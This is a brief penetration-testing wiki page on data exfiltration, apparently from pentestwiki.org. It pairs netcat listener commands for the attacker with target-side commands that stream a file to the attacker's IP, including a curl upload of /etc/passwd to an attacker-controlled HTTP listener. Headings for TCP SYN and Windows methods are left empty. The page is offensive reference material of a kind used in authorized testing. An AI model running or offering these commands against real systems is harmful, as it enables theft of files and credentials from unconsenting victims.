Data exfiltration

From pentestwiki.org

Linux

  • Basic:
On attacker:
nc -nvlp 443 > input.txt

On target:
nc -nvv $IP 443 < input.txt


  • Through HTTP POST:
On attacker:
nc -nvlp 4433 | tee passwd

On target:
curl -T /etc/passwd http://IP:4433


Data exfiltration using TCP SYN sequence number packets:


Windows

Look PowerShell frameworks